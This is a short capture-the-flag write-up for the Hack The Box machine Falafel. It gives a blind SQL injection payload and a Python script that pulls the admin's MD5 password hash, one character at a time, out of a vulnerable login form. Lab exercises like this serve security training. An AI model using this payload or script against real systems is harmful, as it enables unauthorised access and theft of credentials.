Blind SQLi : Falafel (HTB)

  • Script Description: the script is automating the extracting of admin's hash using Blind SQli payload

  • Payload : admin' and substring(password, 1, 1) = '0' -- -

  • Machine: HTB machine, Falafel

  • Output:

import requests 

loginPage = '<http://10.10.10.73/login.php>'
extractedHash = ''
# Loop 32 times - length of the MD5 hash 
i = 1
while i <= 32 :
    # Loop over the MD5 character set
    MD5Characters = "abcdef0123456789" 
    for char in MD5Characters:
        # injection into username parameter, each time we brute force the current hash character
        parameters = {'username': "admin' and substring(password, "+str(i)+", 1) = '"+ char + "' -- -",'password':''}
        # save the response into an object
        response = requests.post(loginPage,data=parameters)
        # getting the html content from response object
        html =  response.text
        # Check BlindSQLi Cases : 
        # 1 - "Try again" case: is the false case for BlindSQLi (injected the wrong hash char, so we will skip this char) 
        # 2 - In else case: the application will response with "Wrong identification", which means we used the correct username, and the injected char is used in user password hash , so we will save this char into a variable
        if (html.find("Try again..") != -1):
            #print("False Case")
            pass
        else:
            #print("True Case")
            print("[+] Current Position is %d and the Extracted Char is %s " %(i,char))
            extractedHash += char
            break
    i+=1    
print ("[++] The hash of the admin user is :" + extractedHash)

Last updated

Was this helpful?